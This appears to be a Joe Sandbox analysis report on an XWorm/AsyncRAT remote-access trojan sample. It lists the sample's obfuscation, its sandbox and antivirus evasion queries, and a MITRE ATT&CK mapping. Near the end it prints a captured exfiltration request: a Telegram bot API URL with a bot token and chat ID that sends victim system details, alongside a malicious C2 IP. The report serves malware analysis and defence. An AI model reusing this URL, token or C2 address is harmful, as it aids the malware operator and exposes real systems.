'V41AXdXRfohEGR0ea2I1kBGrbFeFb7frm4Y3YZ1FB2QHwHi368a6UPrH3ZgAmiKBBqkh0cS3TNxAQoXi'
                  Source: 2ehwX6LWt3.exe, hMY5B4KaPYBa602NktZ1e4wVF.csHigh entropy of concatenated method names: 'WxO6haGbmISoUIXjKWGw5O0f6', '_1KdIk1gCCecm5eb5zn8kSjK12', 'PxlPQIsDfwQvPbKvl2sd3YzC2', 'PQy6sJgSzykRZLc0OQgp3FF40', 'EILjjH71J0z6TCdH4iiqNMin5', 'QyEqwp20c4swV4XJJGsgNpnyq', 'LcILsujkk2zDB1CPWPVFG2jJx', 'uJOKVr0lx53sKgbsneL3CqWRx', 'f9VWvJM0sfsTL6ygejd44nBUT', 'LlvOkQs0TO79zqf2p1q3KccCh'
                  Source: 2ehwX6LWt3.exe, jK41xlYzptzDvBwid77hpLBxe.csHigh entropy of concatenated method names: 'OKzUlm8N3VhAQNuXvYaHxIv0O', '_2jsV4Dr67P8WIcVYQJEwwfWilcqMU7dWO5FaXzBdwnR', 't33agRLkVoIksIMaeHSr25f5MenSU0vXFDLuVr5rAWm', 'BVIgd1nQM1laXCOCutMUo4uF0HHRkd5UhpQp2AsEeS6', 'Ra43n4P4GpAazsLfytyMIOCicKFs70KMZtEfMom59my'
                  Source: 2ehwX6LWt3.exe, bfkfUlXphuDWexMb7Hptw9A0Uiqaqiv3wcTDH2rsesSLHtj7cBMyE3HGKstJUv0HzfSu8adin33UdVLY.csHigh entropy of concatenated method names: 'HDzzscQJvBYBgYGtyyJw0Z62S91wb7ZXDt1NMuqGZTnSVN2vcQlDTHXeH2XAhC3gmojn3hCdfamp4xSP', 'DyRfj0jL7Ne2bEzdE2WfU2J4e', '_5cwjx4oJK76DGZBC7HDMSIo6L', 'EkkfnLKHA7eoPdl7FGnKbHjqz', 'XPrOaSGzOF9BMPB0rdF2ZuE16'
                  Source: 2ehwX6LWt3.exe, pSKX2ESKYwtRu7HoonhxcJzXgzsbsBZuYOVd9Vds3yt1hGYR8g17cCz98HD7kBGbZuAOSHn3AJPgLdPW.csHigh entropy of concatenated method names: 'RegexResult', 'WndProc', 'AlbU71MZss4P6Ud3ulC0jWSFtpHi3ZI21vljNexmkwF', 'vaWpfakNS07K6OJldx85Yn0LszjPpqeyLwg5G7rfYDr'
                  Source: 2ehwX6LWt3.exe, lY7fu9PmBNVoe7FoMUHT8miYA4vYaJzHYkvOgkLtM9q5YWq4XECDe3geFnamAon5jKsHVH7R7dVyQ7jT.csHigh entropy of concatenated method names: '_5okLwiJ41foiIntIR1bpQIYeVfb2NjbOtPiEyruBdM93JdUDOzPl2DNcdaVHYoqzlbhpqvLy0J9EUv5c', 'zRuxKtrhDWbunSLsf08MNFwph9WUoxAFk7Peo2bBSgilCpod6rdX1Dipbez5CkglY8zOH38ZMrRgwDGy', 'fZjSXjVI15O2JneQcWK85ilLwUINAP6B4FkyPJRSzFE61yuJPAJ19HsvusKKZTzfg7lUQuBArOldit1m', 'H9LK03UymbxxebVhWZLTVv3J88tyfIEKzzm9OStrPybmLFzdpu1V3lVipOh8awPV4gwN4DXIusrByqJs', 'staanouH9VVllYfUirHPC8zURapjFNgkbkbX2so6bIvb3wjagEhKC8k4nreHsHMrkbfHI1zpEdwNYZDe', 'pksVU8d9sjP2rIBvVbq1TZVmILG3XBWNflKO6HKmIgXkSbX6NZ5DgPC3M0cZ9EsA0GNH75zt5OAnngZT', 'GxfNTiSDCrb2TBkwI3tRzIuCv', 'iqbQLy0cKqXw68POWUFeBa0d0', 'aQEYPV88MgVpz2hMiTlWb6OeS', 'TcHYqV6bJRKM2fPlJrCwUZzmw'
                  Source: 2ehwX6LWt3.exe, eaJ1eKHKproU4hPKL7zZaCt5LB6GnC019powyiFeyxf1p497Wp7fUp93E51MTTI9BUzY4mbqnkBEPVkB.csHigh entropy of concatenated method names: 'AddClipboardFormatListener', 'SetParent', 'rjdrfrwAPPrH1gmYvWMyWqSDfwqLZrtzMOvlKFth4qIJyiOf0wirwL5Om8LDhRnfIXZdMIop9WZXlb93', 'xXTE3lS6QGxTBbQ6kgQwrnpXxPaNKn9C9N6INDuT2MlzvDfgO4DXX3oQtM', 'CoeaOGHXL0uzLmA25lE8RaXN5bTKg89qRqnXEiCDnBpP14hEsB1GcFe021', 'zlIqWsIOWHNCPt6mOc8ndEvujhC768c6GbdgaLArA3C', 'efdMufKoG8bO1IUbkgO4A2TnkTN9z1dusJF9Pcw3daY'
                  Source: 2ehwX6LWt3.exe, AJvfNnDNTuJbwuIBkqtWLE92s69ypiSn3oEaccD5GcHIniAl3b0xmXCXXRQlDua39ELK6FfoXcbxDFtY.csHigh entropy of concatenated method names: 'Zc0UAmirWNgMyU7RPbJclq0193JoKzdFjsT4ZUKLtBhG1SBtPc6mSKSfvhSv0MF6g3KbymOiN34vXBn2', 'xTtuDFtpunXLooIWmqJev5GyqjMpjlO5Pn7UNZnkHrIGoYIGVa7IoMZCEfCFnDuXsUC2rwixA1bjDEUw', 'qOAWJaM4h2YSCf2MDhBIMnRhdMBJLpG0SKzQTS3P80vgUs7g3cS7PK9ThtidaIT1R0d1c5geZf4JXViM', '_2GsH2tkogI2SHuEIgb66fa097', '_6NGmkasVpmvh070n767Zd89nMCnZKzTKwRTM5nXWcHH', 'HRTNPv742zdrFAMGwyGGxu87xflCuNVlRzsJRf3UiCU', 'V79dguIYFqPHIKmsX53d2RFCHn4VhwACswLW99D4JC7', 'IZMLsuKXM0BIC3Kj75qehAvrxsOQwkZ30Igw0JxA80b', '_8bWGcTHdIsr9qNXOZP7YFjCbS0Kns99IFIzGWB3tHiN', 'R3atKa2W4XuqIcUUDI38NAdMcGQGZVbBvDxDMlnf6KB'
                  Source: 2ehwX6LWt3.exe, jGx5RVtWYDbZ1ToL6PNlOwWojB7jLJ6X5CBAFyGmvjvmlmioDwDZ5YjCVlsreufEP7Xse0xBH6GOHG8W.csHigh entropy of concatenated method names: 'PtV3PgKoBJTBfHxOerUNidcwttFhlmwA8WDrWJTvwC2tOWY6l2hr9WVMOE316RohdBnAt9DUJhilYxz3', '_8BcFZG9nKm0Y5eKfyHrDW01Wvwc7CixNNvv1qM9DSM7Xw9wX7hUMTZk9L2NrMS48M02xNbGRVqjpgeq0', 'r2jWTD7FccKEuteed9WoBhB1Vn4JqKKksl3P579LWfpSQW3lTEyzyN91wfwmfHktqShUVwDDavsU1w5r', '_1exytb0IPi12lfcbJAUh2727dO4kKzebEdYC9Pfp0kLBrUrqJOh9CBvY5JR50upgpoe4v1NAZTP9fLwf', 'dZsr8qHlvW1VCFIgnTvIMwWbWMJnC1TmJfHt6k8S2m3inKm9yojdFlmddNEqv0ZiX9eQe4LHUZHN04FI', 'jpDYV1bSvTmVc8YKjIjO2igHlU5iQbA37qnhQlaqhX8i9PzhNLXiZAv3xwb49LcIFxEGJ1FdueFBS7P3', '_2OgwX7POlj3Lc7k0HVLc96Jm1H13YqCu3MmxPt8PTCnT7UO158KKKLsh39l3t9KhGVtNJN8WXk0fPI73', 'pZFSqEaHAjFQiDGNuydShEAx9dEA9Z4XEyA9cjqfApsDWcTUx4G11fj6Fnd4Qa5F3r9uiYWbxvzA5Uoi', 'wPprlMMgS8b7KRfzzaYNtXG224hdQjXdQA2bY9s37h5XyJI0wqfyVDN55SZpOCxoo94AweNHBnHgQ8Tu', '_3DEtVD6Qj8FBLGIMfr4L1gJLG5Wh10yDVfhAwiXkVFEtyC8yiF81mnqH85ItdVEe6Xios4sz19oD7SY6'
                  Source: 2ehwX6LWt3.exe, UyBaVrh3yB8AUovlO5XfdkL7t5iY1o8XuCf70QNOaAGbj0Iy7nKlDMcpODCvfW8bQM4dJA5qWzXqC8F1.csHigh entropy of concatenated method names: 'PNucxFnsZsmAH7ZtXAiLbYhTNwtoXdI3jSrG7l8JdFYI8y4ECae9QkpQxfCHI9CjoO37RtMbdN9QCRXA', 'jLiZEHlb8BeExAypewg0zeOoIRJBC4B4awLpTrKIInWmOfnIoqLljjFzAd1r2ByGWGH98bloN9ZRBPtd', 'tLRtcoizkEN95DWlJbuywj8qmTExZ2cF4QDYZKjqtBmUUedW8T9LcTtJFgNgl26hmcD6HXf3sdOMy3G7', 'pUQwgSO8RxKDRVwxnrsUWWj0QvQfWjrWlfB32szLybBrnHNL6P42mf3fEeFhXZQaTya4hKG6HBVYia6X', 'saI1iCbtHUFoBOe0YDbOsFuazEiP9peNaRt8lfw92OqJCrtCr0ntP3cXoqTKn0apPe2I7AbDQPdKNIRC', '_2LsIhZlfyiomhnjRA5BvAhexUvDfebqf3EIoHS0ytB9QGrcn0ugT72LAgdp9Grpxo0H4F7YyXQhOFPOy', '_5AWy2heCIieySYSYqguGUmV6MLXLVTLloftBenWstbEZdWXKjxN3X0bgVyF0wh25yHIvtuM1JbN9IsYP', 'WUvexTw2mL3On7KYwkAaLpgLg4QvlFX5Lg4Hs3pvpuyJAX12BxwE6WI7y2EbRbEwB6Ra5UdwXI7e0OgU', 'Ii9U3wE8YOPWYQykTTsUNk92la58iAVmecCGoooKy9uv8H2onRYJ7hpsTsnh61XZcHrteUk8Xbtobs67', 'kc0jgJebYNKe5XBYQAIof8kMjBCh79rlVPyB41WIALEb1JkDpf7SWQ7eAsYqDHx4WBu3vttZF2VEqDFC'
                  Source: 2ehwX6LWt3.exe, qmTkyAvhb2wNt6EFJkgKoQx8PUNM9p5XrEj4MhYLRljIFetnOWMNbr3hROe7cILDy1AzKJEMlJzfISXn.csHigh entropy of concatenated method names: 'T8N6JYRItBvITsl2B5FCZRlmiaVshMFO1A1pS8qCoXVzg8WrRMPQrOZ2MjWPZDNL96s4ZDXD0859xnzb', 'Hp4ifZNL0Zk6d3JpS3mb9ecb3cvLWnhrESlgjj4yKKVf2HuHhLzO70Ux8rvFtMehJKX6BsXWtMZA8md6', '_5I6uyywkP7w8NWl9CieCynsQVnYWuakDbIwAzhA75v0', 'CZK5mO0F213iwf5NMqGRXS9Fh8854sXfzLFunHGtctS', 'BsZyf5sKGTGC1Lb0aJbVV7wYV9Ce92dym7bdyixwf6K', 'Wo93OYkcN7j0LD2jtZuBD4VOYyPxDuYYemH99eds4Ph'
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                  Malware Analysis System Evasion

                  barindex
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeMemory allocated: C90000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeMemory allocated: 1ABF0000 memory reserve | memory write watchJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWindow / User API: threadDelayed 9541Jump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exe TID: 5716Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeFile Volume queried: unknown FullSizeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeThread delayed: delay time: 922337203685477Jump to behavior
                  Source: 2ehwX6LWt3.exe, 00000001.00000002.4663242560.000000001B808000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKKZ
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeMemory allocated: page read and write | page guardJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeQueries volume information: C:\Users\user\Desktop\2ehwX6LWt3.exe VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                  Source: 2ehwX6LWt3.exe, 00000001.00000002.4661345933.0000000000CAC000.00000004.00000020.00020000.00000000.sdmp, 2ehwX6LWt3.exe, 00000001.00000002.4663242560.000000001B7B0000.00000004.00000020.00020000.00000000.sdmp, 2ehwX6LWt3.exe, 00000001.00000002.4663242560.000000001B87D000.00000004.00000020.00020000.00000000.sdmp, 2ehwX6LWt3.exe, 00000001.00000002.4663242560.000000001B808000.00000004.00000020.00020000.00000000.sdmp, 2ehwX6LWt3.exe, 00000001.00000002.4661345933.0000000000CA6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
                  Source: C:\Users\user\Desktop\2ehwX6LWt3.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                  Stealing of Sensitive Information

                  barindex
                  Source: Yara matchFile source: Process Memory Space: 2ehwX6LWt3.exe PID: 2656, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 2ehwX6LWt3.exe, type: SAMPLE
                  Source: Yara matchFile source: 1.0.2ehwX6LWt3.exe.820000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.2179937963.0000000000822000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2ehwX6LWt3.exe PID: 2656, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: 2ehwX6LWt3.exe PID: 2656, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 2ehwX6LWt3.exe, type: SAMPLE
                  Source: Yara matchFile source: 1.0.2ehwX6LWt3.exe.820000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000001.00000000.2179937963.0000000000822000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: 2ehwX6LWt3.exe PID: 2656, type: MEMORYSTR
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Windows Management Instrumentation
                  1
                  DLL Side-Loading
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  OS Credential Dumping121
                  Security Software Discovery
                  Remote Services11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts131
                  Virtualization/Sandbox Evasion
                  LSASS Memory1
                  Process Discovery
                  Remote Desktop Protocol1
                  Clipboard Data
                  11
                  Encrypted Channel
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                  Deobfuscate/Decode Files or Information
                  Security Account Manager131
                  Virtualization/Sandbox Evasion
                  SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                  Obfuscated Files or Information
                  NTDS1
                  Application Window Discovery
                  Distributed Component Object ModelInput Capture1
                  Ingress Tool Transfer
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Software Packing
                  LSA Secrets13
                  System Information Discovery
                  SSHKeylogging2
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading
                  Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input Capture13
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand
                  SourceDetectionScannerLabelLink
                  2ehwX6LWt3.exe82%ReversingLabsByteCode-MSIL.Spyware.AsyncRAT
                  2ehwX6LWt3.exe100%AviraTR/Spy.Gen
                  2ehwX6LWt3.exe100%Joe Sandbox ML
                  No Antivirus matches
                  No Antivirus matches
                  No Antivirus matches
                  SourceDetectionScannerLabelLink
                  89.40.31.2320%Avira URL Cloudsafe
                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.telegram.org
                  149.154.167.220
                  truefalse
                    high
                    fp2e7a.wpc.phicdn.net
                    192.229.221.95
                    truefalse
                      high
                      NameMaliciousAntivirus DetectionReputation
                      89.40.31.232true
                      • Avira URL Cloud: safe
                      unknown
                      https://api.telegram.org/bot5630894183:AAFSNB69Q2a6dw-6XMnWlasTfT2befh82Rk/sendMessage?chat_id=793028759&text=%E2%98%A0%20%5BXWorm%20V5.6%5D%0D%0A%0D%0ANew%20Clinet%20:%20%0D%0A76B6983BF380F8767E2E%0D%0A%0D%0AUserName%20:%20user%0D%0AOSFullName%20:%20Microsoft%20Windows%2010%20Pro%0D%0AUSB%20:%20False%0D%0ACPU%20:%20Error%0D%0AGPU%20:%20Y5P36%20%0D%0ARAM%20:%207.99%20GB%0D%0AGroub%20:%2028Nov2024false
                        high
                        NameSourceMaliciousAntivirus DetectionReputation
                        https://api.telegram.org/bot2ehwX6LWt3.exefalse
                          high
                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name2ehwX6LWt3.exe, 00000001.00000002.4661828510.0000000002BF1000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            • No. of IPs < 25%
                            • 25% < No. of IPs < 50%
                            • 50% < No. of IPs < 75%
                            • 75% < No. of IPs
                            IPDomainCountryFlagASNASN NameMalicious
                            149.154.167.220
                            api.telegram.orgUnited Kingdom
                            62041TELEGRAMRUfalse
                            89.40.31.232
                            unknownRomania
                            35512TELEMEDIA-ASROtrue
                            Joe Sandbox version:41.0.0 Charoite
                            Analysis ID:1562434
                            Start date and time:2024-11-25 15:35:41 +01:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 10s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                            Number of analysed new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Sample name:2ehwX6LWt3.exe
                            renamed because original name is a hash value
                            Original Sample Name:e70aace0217f5661dbce366d36a9bfda8cd4d2b29bb39f71a09ef81c76fa1bc5.exe
                            Detection:MAL
                            Classification:mal100.troj.evad.winEXE@1/0@1/2
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 99%
                            • Number of executed functions: 5
                            • Number of non-executed functions: 2
                            Cookbook Comments:
